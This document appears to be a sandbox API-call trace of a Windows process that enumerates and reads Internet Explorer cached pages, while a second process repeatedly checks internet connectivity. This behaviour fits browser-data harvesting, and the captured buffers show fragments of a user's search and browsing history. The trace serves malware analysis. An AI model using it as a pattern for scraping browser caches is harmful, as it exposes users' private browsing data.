| 07:44:51,789 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrom,",[["chrom \u003cb\u003efire emblem\u003c\/b\u003e",0],["\u003cb\u003echrome\u003c\/b\u003e \u003cb\u003estore\u003c\/b\u003e",0,[10],{"zb":"\u003cse\u003echrom\u003c\/se\u003e store","za":"\u003csc\u003echrome\u003c\/sc\u003e st FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,789 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,789 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\index[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,799 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,989 | 504 | NtReadFile |
Buffer => ass="image">
<div class="icon video"></div><img alt="" src=
"assets/consumer/images/tiffany/thumbs/oz.jpg">
</div>
<div class="shadow"></div>
<div class="text">
Oz Th FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,099 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:52,109 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x00\xa0\x0c\xba\x99\xe3\x91\xcf\x01\x00\x1b\xbd\x99\xe3\x91\xcf\x01\x00\x1b\xbd\x99\xe3\x91\xcf\x01\x00\x1b\xbd\x99\xe3\x91\xcf\x01i\x05\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x18\x00L\x00I\x00G\x00H\x00T\x00R\x00~\x001\x00.\x00P\x00N\x00G\x00l\x00i\x00g\x00h\x00t\x00r\x00o\x00o\x00m\x00[\x001\x00]\x00.\x00p\x00n\x00g\x00p\x00\x80\x00\x00\x00\x00\x00\x00\x00\xe0\x1d\x83w\xe3\x91\xcf\x01\x80h\xc9w\xe3\x91\xcf\x01\x80h\xc9w\xe3\x91\xcf\x01\x80h\xc9w\xe3\x91\xcf\x01F\x02\x00\x00\x00\x00\x00\x00H\x02\x00\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00L\x00O\x00G\x00O\x00-\x00A\x00~\x002\x00.\x00G\x00I\x00F\x00l\x00o\x00g\x00o\x00-\x00a\x00d\x00o\x00b\x00e\x00[\x002\x00]\x00.\x00g\x00i\x00f\x00 |
SUCCESS | 0x00000000 | |
| 07:44:52,109 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\mainwindow[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,109 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,240 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:52,240 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\sck[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,240 | 504 | NtReadFile |
Buffer => <iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dA6159155E50F480FB86A6A6B4062A51F%3b&h=cfe7dcda-4629-fcc3-a8c2-b7758b7f4768" height="0" width="0" frameborder="0"></iframe> FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,240 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:52,240 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\search[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,240 | 504 | NtReadFile |
Buffer => <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/google_favicon_128.png" itemprop="image"><title>net redistributable - Google Se FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,250 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:52,250 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:52,250 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:52,250 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:52,250 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:52,310 | 504 | NtReadFile |
Buffer => m-dropdown-menu-item"><a class="am-dropdown-menu-item-text" href="/url?q=http://webcache.googleusercontent.com/search%3Fq%3Dcache:ViryUFKmlJYJ:http://www.microsoft.com/en-us/download/details.aspx%3Fid%253D17718%252Bnet%2Bredistributable%26hl%3Den%26%26ct%3 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,340 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:52,340 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => p\x00\x00\x00\x00\x00\x00\x00P\x87v\xf5\xdf\x91\xcf\x01P\x87v\xf5\xdf\x91\xcf\x01P\x87v\xf5\xdf\x91\xcf\x01P\x87v\xf5\xdf\x91\xcf\x01\xa7\x0c\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x16\x00T\x00H\x00_\x004\x00_\x00~\x001\x00.\x00J\x00P\x00G\x00\x00\x00t\x00h\x00[\x004\x00]\x00.\x00j\x00p\x00g\x00p\x00\x00\x00\x00\x00\x00\x00\xa09\x81\xf5\xdf\x91\xcf\x01\xa09\x81\xf5\xdf\x91\xcf\x01\xa09\x81\xf5\xdf\x91\xcf\x01\xa09\x81\xf5\xdf\x91\xcf\x01c\x0f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x16\x00T\x00H\x00_\x005\x00_\x00~\x001\x00.\x00J\x00P\x00G\x00\x00\x00t\x00h\x00[\x005\x00]\x00.\x00j\x00p\x00g\x00p\x00\x00\x00\x00\x00\x00\x00\x90\xdd\x88\xf5\xdf\x91\xcf\x01\x90\xdd\x88\xf5\xdf\x91\xcf\x01\x90\xdd\x88\xf5\xdf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:52,350 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:52,350 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:52,430 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:52,430 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01`\x08-\x8cX\x94\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00[\x004\x00]\x00\xb0\x00\x00\x00\x00\x00\x00\x00@\xcf\x86\xf0\xdf\x91\xcf\x01@\xcf\x86\xf0\xdf\x91\xcf\x01@\xcf\x86\xf0\xdf\x91\xcf\x01@\xcf\x86\xf0\xdf\x91\xcf\x01U\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x18\x000\x000\x000\x000\x000\x000\x00~\x001\x00.\x00G\x00I\x00F\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x00_\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x005\x001\x00 |
SUCCESS | 0x00000000 | |
| 07:44:52,430 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\activityi;src=2542116;type=clien612;cat=chromx2;ord=8175865229992[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,430 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><div style="display:inline;">
<img height="1" width="1" style="border-style: FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,430 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:52,430 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\browser[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,430 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,630 | 504 | NtReadFile |
Buffer => installing the package.
</p>
</div>
<div class="win-content" id="win-opts">
<p class="default-browser-opt">
<label><input checked id="default-cb" type="checkbox" value="set"> Set Google Chrome as
FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,630 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:52,630 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \xc8\x00\x00\x00\x00\x00\x00\x00pT)\x16\xe0\x91\xcf\x01`\xf80\x16\xe0\x91\xcf\x01`\xf80\x16\xe0\x91\xcf\x01`\xf80\x16\xe0\x91\xcf\x01\x91H\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x00 \x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00J\x00Z\x00K\x00E\x00O\x00~\x001\x00.\x00E\x00O\x00T\x00c\x00J\x00Z\x00K\x00e\x00O\x00u\x00B\x00r\x00n\x004\x00k\x00E\x00R\x00x\x00q\x00t\x00a\x00U\x00H\x003\x00f\x00Y\x006\x003\x002\x003\x00m\x00H\x00U\x00Z\x00F\x00J\x00M\x00g\x00T\x00v\x00x\x00a\x00G\x002\x00i\x00E\x00[\x001\x00]\x00.\x00e\x00o\x00t\x00I\x00F\x000\x00\x80\x00\x00\x00\x00\x00\x00\x00 \xf2\xc8\xf2\xe3\x91\xcf\x01`H\xdb\xf2\xe3\x91\xcf\x01`H\xdb\xf2\xe3\x91\xcf\x01`H\xdb\xf2\xe3\x91\xcf\x01\xc8%\x06\x00\x00\x00\x00\x00\x000\x06\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:52,630 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\conditionalbanners[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,640 | 504 | NtReadFile |
Buffer => [{id:'FIiab', f:0, r:21, eC:1, nW:0, jD:{isChecked:1}, iC:'MSFT,', bT:'Olet avannut MSN-sivuston maasta, jolla on paikallinen sivusto. Haluatko siirty\xc3\xa4 MSN Suomi -sivustoon?', cbc:'3', cbd:'30', cC:'FI', lnk1:'http://fi.msn.com/?st=1',lb1:'KYLL\xc3\x84', lnk2:' FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,650 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:52,650 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\flex[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,650 | 504 | NtReadFile |
Buffer =>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">si_ST=new Date;var Conf FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,740 | 504 | NtReadFile |
Buffer => Unuyvsou3ErPp1srHIUnHFRp1UdsUUUIQ25GNn0oXiLPfpRRTERP8Ae/CpoflwRwef5UUULcHsapO+9gLcknd+OM/zqS4A+zvx1Q0UVhifiie1lSTo1LmIlFFFbnjH/9k=" data-fallback-src="/th?c=8&rs=2&pid=BingWidget&u=http%3A%2F%2Faz412006.vo.msecnd.net%2Fimages%2F1281356722&w FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:52,830 | 504 | NtReadFile |
Buffer => N0I963nHTUUWcBq3hm7sAWVZLi3HAlRSSo/2lHT6jj6Umk+EbnUSklw8lvannO3Dv8A7oPQe5/CqnxC164uNZS2t7mSOztkO0RsV3NyGYkdfQe31Ndf4L1i51TQIft4xdRrjcx+aWP+Fz746/n3rnVKPMauq+U6PTYoNMgiii/dQwj5Yox0Hck/zJ5Nc62onUviEJ5DiG3ikcj0ATAHt1FW/EXifTdDtktJ7qKO6mUttOTx23YHAP64rA8MtDfJN FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,011 | 504 | NtReadFile |
Buffer => =slicebox,dqs=0,nc=1,frsz=1,sz=12,rl=0','Weight': 1}],'newsrandom':[{'Name':'mixbingnowv2hashtags~fclr=3,nnews=1,frsz=1,sz=12,rl=0','Weight': 1}],'extrandomtext':[{'Name':'mixbingnowv2hashtags~l=sleek,rem=1,fclr=3,pil=8,lsixp=240,plc=1,sz=20,naf=12,frsz=1' FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,051 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:53,051 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:53,051 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:53,051 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:53,051 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:53,071 | 504 | NtReadFile |
Buffer => t/css'>body{background-color: ",e,";} div.br{border-right: solid 2px ",e,";} div.bb{border-bottom: solid 2px ",e,";} ",n.join("")," </style>"].join("")).appendTo("head")}}catch(v){}}function u(){var n,i;try{if(_H.color!=null&&_H.color.length>0&&_H.backgrou FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,111 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:53,111 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\f[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,111 | 504 | NtReadFile |
Buffer => window.google.ac.h(["ch",[["ch\u003cb\u003eipotle\u003c\/b\u003e",0],["ch\u003cb\u003ease\u003c\/b\u003e",0],["ch\u003cb\u003ease online\u003c\/b\u003e",0],["ch\u003cb\u003eeap flights\u003c\/b\u003e",0],["ch\u003cb\u003eick fil a\u003c\/b\u003e",0],["ch\u FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,111 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:53,111 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,111 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrom,e",[["\u003cb\u003echrome\u003c\/b\u003e",0,[10],{"zb":"\u003cse\u003echrom e\u003c\/se\u003e","za":"\u003csc\u003echrome\u003c\/sc\u003e"}],["\u003cb\u003echrome\u003c\/b\u003e e\u003cb\u003extensions\u003c\/b\u003e",0,[10],{"zb FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,111 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:53,121 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x000~\x05c\xe5\x91\xcf\x01\xc0\xbd\xe6\x8bX\x94\xcf\x01P\x02Xc\xe5\x91\xcf\x01P\x02Xc\xe5\x91\xcf\x01\xd5?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00A\x00I\x00N\x00W\x00I\x00~\x001\x00.\x00H\x00T\x00M\x00m\x00a\x00i\x00n\x00w\x00i\x00n\x00d\x00o\x00w\x00[\x001\x00]\x00.\x00h\x00t\x00m\x00\x80\x00\x00\x00\x00\x00\x00\x000\xf5w\xf2\xe3\x91\xcf\x010\xf5w\xf2\xe3\x91\xcf\x010\xf5w\xf2\xe3\x91\xcf\x010\xf5w\xf2\xe3\x91\xcf\x01JF\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00A\x00I\x00N\x00W\x00I\x00~\x002\x00.\x00C\x00S\x00S\x00m\x00a\x00i\x00n\x00w\x00i\x00n\x00d\x00o\x00w\x00[\x002\x00]\x00.\x00c\x00s\x00s\x00 |
SUCCESS | 0x00000000 | |
| 07:44:53,121 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\mainwindow[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,121 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,181 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:53,181 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\mainwindow[2].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,181 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,311 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:53,311 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\thankyou[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,311 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,521 | 504 | NtReadFile |
Buffer => src="//www.google.com/tools/dlpage/res/chrome/images/chrome_throbber_fast_16.gif"></span>
</div>
</div><script src="/intl/en/chrome/assets/common/js/chrome.min.js">
</script> <script src="/intl/en/chrome/assets/common/js/installer.min.js">
</scr FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,531 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:53,531 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x00\xb0\xf1\xe3\x12\xe0\x91\xcf\x01\xe0x\xe5\x12\xe0\x91\xcf\x01\xe0x\xe5\x12\xe0\x91\xcf\x01\xe0x\xe5\x12\xe0\x91\xcf\x01\xab8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x18\x00T\x00I\x00F\x00F\x00A\x00N\x00~\x001\x00.\x00C\x00S\x00S\x00t\x00i\x00f\x00f\x00a\x00n\x00y\x00[\x001\x00]\x00.\x00c\x00s\x00s\x00h\x00t\x00m\x00x\x00\x00\x00\x00\x00\x00\x000\xd3\x9c\xf3\xdf\x91\xcf\x01P\xfe\xa5\xf3\xdf\x91\xcf\x01P\xfe\xa5\xf3\xdf\x91\xcf\x01P\xfe\xa5\xf3\xdf\x91\xcf\x010\x83\x01\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x16\x00W\x00I\x00D\x00G\x00E\x00T\x00~\x001\x00.\x00J\x00S\x00\x00\x00w\x00i\x00d\x00g\x00e\x00t\x00s\x00[\x001\x00]\x00.\x00j\x00s\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:53,531 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:53,531 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:53,612 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:53,612 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\xb08,\x8dX\x94\xcf\x01`= \x86\xe6\x91\xcf\x01`= \x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00f\x00f\x00a\x00\xa8\x00\x00\x00\x00\x00\x00\x00P\xec\x04\xf0\xdf\x91\xcf\x01P\xec\x04\xf0\xdf\x91\xcf\x01P\xec\x04\xf0\xdf\x91\xcf\x01P\xec\x04\xf0\xdf\x91\xcf\x01\x02#\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00\x18\x001\x008\x007\x00A\x009\x006\x00~\x001\x00.\x00P\x00N\x00G\x001\x008\x007\x00a\x009\x006\x007\x003\x00b\x004\x006\x00f\x005\x000\x00b\x00e\x00f\x006\x00d\x00c\x00f\x004\x00f\x006\x000\x00a\x00a\x000\x00d\x00 |
SUCCESS | 0x00000000 | |
| 07:44:53,612 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\details[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,612 | 504 | NtReadFile |
Buffer => \xef\xbb\xbf<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="robots" content="noodp,noy FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,682 | 504 | NtReadFile |
Buffer => osoft.com/?WT.mc_id=MSCOM_EN_US_HP_MODHOME_131Z4ENUS21977" bi:linkid="Modules_For home_Support_Microsoft Support home" bi:index="0">Find more support</a></li><li id="c820ee4b-54dd-e469-ea5e-2266d76ef4cb"><a id="8804d3db-2f2b-ea69-48df-b4b08eec4899" target= FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,762 | 504 | NtReadFile |
Buffer => iv class="moreinfo-desc"><p><span class="loc" locid="9cbcac33-5222-831e-9b25-b79a64bf9be1" srcid="9cbcac33-5222-831e-9b25-b79a64bf9be1">Generally, a download manager enables downloading of large files or multiples files in one session.</span><span class="l FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,842 | 504 | NtReadFile |
Buffer => wnload/details.aspx?id=17718&134b2bb0-86c1-fe9f-d523-281faef41695=1" bi:track="false"><img src="http://c.s-microsoft.com/en-us/CMSImages/info_tip_16x16.png?version=8dd2a4cb-59c7-14a4-2abf-d78d79c815a3" class="mscom-image" alt="More Information" width=" FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,852 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:53,852 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:53,852 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:53,852 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:53,852 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
